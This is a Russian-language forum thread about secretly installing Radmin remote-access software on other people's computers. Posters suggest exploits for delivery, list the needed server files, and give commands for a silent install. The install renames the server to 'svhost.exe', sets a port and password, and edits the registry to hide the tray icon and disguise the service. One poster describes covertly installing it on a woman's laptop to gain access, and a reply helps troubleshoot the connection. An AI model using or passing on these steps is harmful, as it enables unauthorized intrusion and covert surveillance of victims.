Чё, под видну один сплоит что ли? Анимированные курсоры попробовать можно заюзать, wmf, netapi и т.д...
Для работоспобности серверной части достаточно трёх файлов: r_server.exe - сам сервак AdmDll.dll - необходимая длл raddrv.dll - длл видео-захвата(без неё будет пахать всё, кроме удалённого раб.стола) _______________ где взять эти файлы, подскажите плззз!!!
нашел спсибо....но там сервер 2.0 а у меня стоит 3.2...может подкините 2.0 серв???а то под 3.2 не смогу настроить)
Попробовать reg add HKEY_LOCAL_MACHINE\SOFTWARE\RAdmin\v3.0\Server\Parameters /v TrayIconMode /t REG_BINARY /d 01000000 /f Так же посмотреть: http://www.radmin.ru/support/forum/read.php?PAGEN_1=1&FID=13&TID=12841&phrase_id=7345655#nav_start
блин такая проблема...сделал всё как надо..подключился сначало с клиент 3,2 и терь больше не хочет..не подскажите в чем дело??
переименуй исходник еа svhost svhost.exe /install /silence 2 svhost.exe /port:828 /pass:822930 /save /silence 3 REG ADD HKLM\SYSTEM\RAdmin\v2.1\Server\Parameters /v DisableTrayIcon /t REG_BINARY /d 00000001 /f 4 REG ADD HKLM\SYSTEM\CurrentControlSet\Services\svhost /v DisplayName /t REG_SZ /d "Service Host Controller" /f
подскажите плз, как быть вчера поставил жертве радмин вручную с ее же компа(случайно получилось сесть за ее ноут, больше такой возможности в скором времени не приедвидется) так вот. я поставил сборку 3.1 версии он проврена, чувак друго юзает ее, всё получается... но я не могу сконнектиться с ней все равно, IP постоянный, не меняется.... в чем дело, может как-то вьювер настроить мне стоит??? я уже месяц пытаюсь получить доступ к ее компу, и вот удалось засунуть радмин, и вот на те, не коннектиться, все мои ожидания провалились... спасибо заранее за помощь, если кто знает в чем дело и можно ли теперь с помощью уе установленного там у нее радмина законнектиться. помогите
Как у неё организован выход в интернет, ADSL? Если так, то модем по-умалчанию в режиме роутер и её комп находится за NAT и своими открытыми портами в Интернет не светит, тоже самое возможно, если на пути стоит какой-либо еще роутер, может файрвол ещё мешать.